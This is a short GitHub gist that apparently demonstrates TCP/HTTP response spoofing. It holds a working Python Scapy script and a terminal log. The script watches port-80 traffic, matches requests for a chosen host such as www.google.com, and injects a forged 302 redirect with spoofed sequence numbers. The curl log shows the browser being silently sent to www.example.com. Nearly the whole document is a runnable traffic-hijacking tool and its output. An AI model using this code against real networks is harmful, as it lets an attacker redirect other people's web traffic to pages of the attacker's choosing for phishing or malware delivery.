Last active
December 14, 2022 13:02
-
-
Save inaz2/e4f06900ab75a908ebf15446a7575edb to your computer and use it in GitHub Desktop.
Revisions
-
inaz2 created this gist
Aug 8, 2016 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,45 @@ $ sudo python tcp_http_spoof.py >&/dev/null & [1] 3477 $ curl -vL http://www.google.com/ * Hostname was NOT found in DNS cache * Trying 172.217.26.100... * Connected to www.google.com (172.217.26.100) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.35.0 > Host: www.google.com > Accept: */* > < HTTP/1.1 302 Found < Location: http://www.example.com/ < Content-Length: 0 < Connection: close < * Closing connection 0 * Issue another request to this URL: 'http://www.example.com/' * Hostname was NOT found in DNS cache * Trying 93.184.216.34... * Connected to www.example.com (93.184.216.34) port 80 (#1) > GET / HTTP/1.1 > User-Agent: curl/7.35.0 > Host: www.example.com > Accept: */* > < HTTP/1.1 200 OK < Accept-Ranges: bytes < Cache-Control: max-age=604800 < Content-Type: text/html < Date: Mon, 08 Aug 2016 16:28:39 GMT < Etag: "359670651+gzip" < Expires: Mon, 15 Aug 2016 16:28:39 GMT < Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT * Server ECS (cpm/F9D5) is not blacklisted < Server: ECS (cpm/F9D5) < Vary: Accept-Encoding < X-Cache: HIT < x-ec-custom-error: 1 < Content-Length: 1270 < <!doctype html> (snip) * Connection #1 to host www.example.com left intact This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,24 @@ from scapy.all import * class TCP_HTTP_am(AnsweringMachine): function_name="TCP_HTTP_spoof" filter = "tcp port 80" def parse_options(self, target_host="www.google.com", redirect_url='http://www.example.com/'): self.target_host = target_host self.redirect_url = redirect_url def is_request(self, req): return req.haslayer(Raw) and ("Host: %s" % self.target_host in req.getlayer(Raw).load) def make_reply(self, req): ip = req.getlayer(IP) tcp = req.getlayer(TCP) http_payload = "HTTP/1.1 302 Found\r\nLocation: %s\r\nContent-Length: 0\r\nConnection: close\r\n\r\n" % self.redirect_url resp = IP(dst=ip.src, src=ip.dst) / TCP(dport=ip.sport,sport=ip.dport, flags="PA", seq=tcp.ack, ack=tcp.seq+len(tcp.payload)) / Raw(load=http_payload) return resp if __name__ == '__main__': conf.L3socket = L3RawSocket TCP_HTTP_am()()